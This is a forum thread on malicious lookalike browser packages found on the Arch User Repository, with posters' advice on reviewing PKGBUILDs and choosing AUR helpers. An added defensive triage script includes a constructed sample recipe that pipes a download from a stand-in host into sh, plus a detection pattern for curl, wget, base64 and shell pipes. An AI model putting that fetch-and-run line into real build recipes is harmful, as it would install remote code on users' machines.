Malware RAT, GitHub AUR question?

Apparently on the 16th of July, malware uploaded by a user was discovered on the AUR.
Packages that could be affected:
libre wolf fix bin
firefox patch bin
zen browser patch bin

See the 1-minute clip by David:

Should one remove & reinstall packages?

Thank you :folded_hands:

Did you install one of those packages?

Those are not normal packages that most people would have installed. Note the “patch” and “fix” in the package names.

4 Likes

Thanks Dalto, :slightly_smiling_face:
I did install the normal LibreWolf browser, but I thought the malware affected all related packages & dependencies for Firefox, LibreWolf & Zen for Arch users? Thank you :folded_hands:

1 Like

No, it only impacts people who installed those specific affected packages from AUR.

1 Like

Never heard of any of those. Actual AUR versions would be librewolf-bin and zen-browser-bin. There is no firefox-bin. But there is firefox-beta-bin and firefox-esr-bin.

Because they were only there for a short time until they were discovered. The names are obviously suspect though.

2 Likes

100%. Which leads one to realize that anyone running across those apps should have investigated further. Because anyone who’s ever dealt with Arch and the AUR should know better. At least, IMHO.

2 Likes

I have librewolf-bin installed. It would never have occurred to me to look for a separate patch package at the AUR, since the browser is updated all the time.

How did the bad guy lure them in I wonder?

1 Like

You just create a malicious PKGBUILD and upload it.
And ostensibly they simply relied on the names' relation .. not really luring as such.
( Though maybe some enticement to install occurred in some far-off forum or discord server or something that we do not know about. )

One should always read the PKGBUILD .. you can name it anything and have the source be any unrelated thing. Or include any number of additional actions in the recipe.

Or what's probably worse - malicious individuals taking over what was once a trusted PKGBUILD (as has happened in the past).

Always read the PKGBUILD.
Do not rely on autobuilders like Chaotic.

2 Likes

So a user (if such a hypothetical user used yay) who searched with yay -Ss librewolf would get all the returns, including fix-patch or whatever it was called… and decide “that looks like a good librewolf to me.” I.e. it was aimed at first-time librewolf users?

You have that mostly right .. though not necessarily ‘first time’ .. maybe someone saw it and wanted to try it out instead of their current version.

But to be clear there would be no way for some user to get any of these things automatically.

Well .. maybe if they used something like pamac .. because it parses updates to repos+aur combined and has poor logic while doing so .. which has resulted in repository packages being replaced by AUR variants … so if the PKGBUILD was written in such a way that it had something like librewolf in the Provides line then maybe. But again, normally not. The previous example hinges on the package-manager/aur-helper having serious technical problems.
Don't use pamac. :wink:

4 Likes
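Taking the advice in the two replies above literally (read the PKGBUILD before building; watch for a provides= line that names a repo package), here is a small shell script, added as an example and not code from the thread, from yay, paru or makepkg, that pulls out of a PKGBUILD the pieces a reviewer looks at first: which hosts the sources come from, what the package claims to provide, whether checksums are set to SKIP, and whether the recipe itself fetches or runs anything at build time. The function names, the EXPECTED_HOSTS list and both sample PKGBUILDs are constructed for this example; neither sample is a real AUR package.

```shell
#!/bin/sh
# Added example, not code from the thread or from any AUR helper: a PKGBUILD
# triage script that extracts what a reviewer reads first. Function names,
# EXPECTED_HOSTS and both sample PKGBUILDs are constructed.

# Hosts you expect url= and source= entries to point at; anything else is
# reported (assumption: edit this per package you review).
EXPECTED_HOSTS="github.com codeberg.org gitlab.com"

# Constructed sample 1: a lookalike "patch" package (not a real AUR package).
SUSPECT_PKGBUILD=$(mktemp)
cat > "$SUSPECT_PKGBUILD" <<'EOF'
pkgname=examplebrowser-patch-bin
pkgver=1.0
pkgrel=1
pkgdesc="Patched build of examplebrowser"
arch=('x86_64')
url="https://example.invalid"
provides=('examplebrowser')
source=("https://example.invalid/examplebrowser-patch.tar.gz")
sha256sums=('SKIP')

package() {
    install -Dm755 "$srcdir/examplebrowser" "$pkgdir/usr/bin/examplebrowser"
    curl -s https://example.invalid/post-install.sh | sh
}
EOF

# Constructed sample 2: a plain binary package fetched from an expected host.
CLEAN_PKGBUILD=$(mktemp)
cat > "$CLEAN_PKGBUILD" <<'EOF'
pkgname=exampletool-bin
pkgver=2.3
pkgrel=1
pkgdesc="Example tool"
arch=('x86_64')
url="https://github.com/example/exampletool"
source=("https://github.com/example/exampletool/releases/download/v2.3/exampletool-2.3-linux.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

package() {
    install -Dm755 "$srcdir/exampletool" "$pkgdir/usr/bin/exampletool"
}
EOF
trap 'rm -f "$SUSPECT_PKGBUILD" "$CLEAN_PKGBUILD"' EXIT

# Every host named by a URL anywhere in the file (url= and source= included).
pkgbuild_hosts() {
    grep -oE 'https?://[^/"'"'"' )]+' "$1" | sed -E 's#^https?://##' | sort -u
}

# Hosts that are not in EXPECTED_HOSTS, one per line.
pkgbuild_unexpected_hosts() {
    for host in $(pkgbuild_hosts "$1"); do
        case " $EXPECTED_HOSTS " in
            *" $host "*) ;;
            *) echo "$host" ;;
        esac
    done
}

# Names in a single-line provides=(...) array. A lookalike that "provides" a
# well-known package name is what lets a sloppy helper swap it in for the
# repo package, as the thread describes.
pkgbuild_provides() {
    sed -n -E 's/^provides=\((.*)\)/\1/p' "$1" | tr -d "'\"" | tr ' ' '\n' | sed '/^$/d'
}

# Recipe lines that fetch or execute something at build time: curl, wget,
# eval, base64, or a pipe into sh/bash. makepkg fetches source= itself, so a
# clean recipe has no reason for these.
pkgbuild_fetch_lines() {
    grep -nE '(^|[^[:alnum:]_])(curl|wget|eval|base64)([^[:alnum:]_]|$)|\|[[:space:]]*(sh|bash)([[:space:]]|$)' "$1" || true
}

# Checksum arrays set to SKIP: makepkg then accepts whatever the host serves.
pkgbuild_skipped_checksums() {
    grep -nE "^(md5sums|sha256sums|sha512sums|b2sums)=.*'SKIP'" "$1" || true
}

# Print a report; return 0 when nothing is flagged, 1 when a human should look.
pkgbuild_triage() {
    findings=0
    for check in unexpected_hosts provides fetch_lines skipped_checksums; do
        out=$("pkgbuild_$check" "$1")
        if [ -n "$out" ]; then
            echo "[$check]"
            echo "$out" | sed 's/^/  /'
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

pkgbuild_triage "$SUSPECT_PKGBUILD" || echo "suspect sample: review before building"
pkgbuild_triage "$CLEAN_PKGBUILD" && echo "clean sample: nothing flagged"
```

Point pkgbuild_triage at a PKGBUILD you have fetched (the one paru or yay's edit menu shows you) and read whatever it prints. The script never executes any part of the recipe, and an empty report only means the obvious tells are absent, not that the package is trustworthy; the source hosts and the provides list still have to make sense for the package you think you are installing.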

Do these (practical and useful) installers like yay have a mode where you could look at the PKGBUILD before installing?

I mean when I install something new, let’s take the Spanish Piper TTS voice (an easy one), I’d go to its AUR page, hit View PKGBUILD and do a quick check, like “Ok, is this really the one from huggingface.co?”

But, for instance, when I get something like 126 Haskell updates just because I need Pandoc, I would surely not check them all. (Bad example, I know, because Pandoc is in extra—just to make the point.)

The general problem here is that even the technically inclined can get overwhelmed by all the new developments (complicated PKGBUILDs, many deps, etc.), or just get lazy, because we learned over years that it “usually just works”.

End users (shouldn’t use Arch/EOS, okay…) also tend to follow bad AI advice or YouTube videos blindly and just type in whatever they get told, without the wish to learn anything or even care.

“I mean, hey, we have the friendly forums, and people there work day and night for free and will surely help me repair my messed-up system within minutes, right?” (And I get the chance to type in more funny commands without understanding them!)

So yeah, the more popular Linux becomes, the more malicious idiots and script kiddies will find their way in to make life harder for the rest of us.

The only thing that can help is switching on your brains.

That said, the AUR is an invaluable source for great software. Package maintainers and users both put enormous amounts of work into it, just so that we can have life easier and don’t have to build & maintain everything ourselves. My pacman -Qm | wc -l is at 36, and I surely don’t install anything I don’t need (well, except one of those).

But I digress. Back to the original question.

Thank you :folded_hands: Dalto

Many do.
Paru shows it to you first by default.

1 Like

Hmm. That would be my first valid reason to install yet another package manager… I normally only use pacman and yay.

I usually try to keep things pretty much “standard”, since I have to work on so many different systems.

I like paru better.

But yay has a similar option .. you just need to set/save it.

If you have never configured yay before then you could run something like

yay --editmenu --save

The editmenu option will allow you to view/edit PKGBUILDs … this command will save/create a conf in ~/.config/yay containing default values along with the editmenu option.
You can then also observe and/or edit that conf file at your leisure.
(Other options such as editor may be of interest.)

1 Like

Yeah, I already have ~/.config/yay/config.json, now set

"editmenu": true,

in it.

Thanks for the hint! (It’s also in yay’s man page.) That’s a good one, it can save me several manual AUR lookups in the browser.

So which one is better - Yay, Pacman, Trizen or Pamac ( or GUI) please? :folded_hands:

You’d have to ask @cscs for that… Personally, I usually restrict myself to pacman and yay, because I have to work on a lot of different machines (also owned by other people, can’t install paru or others there), and pacman and yay are on almost every Arch-based installation.

I typically use pacman for all Arch things, and yay if I need to access the AUR. There is also eos-update and eos-update --aur, a wrapper around both aforementioned, able to do some EOS-specific things in addition.

My recommendation still is to stay away from GUI-based “supposed-to-be-easy” things like pamac, although it might be tempting. If you are a total newbie, you could install pamac for lookup only, but please don’t use it to install/update software! The “basics” like pacman, yay and paru are much safer and more robust. They are also quite easy to use, once you have memorized just a few commandline options, like using -Syu (sync, refresh, sysupgrade) when installing software.

2 Likes

There is no “better”; however, in this case there is a worse (pamac).

Personally, I suggest sticking to the command line (pacman, paru). However, if a more graphical approach is desired, then I recommend pacseek from the AUR.

1 Like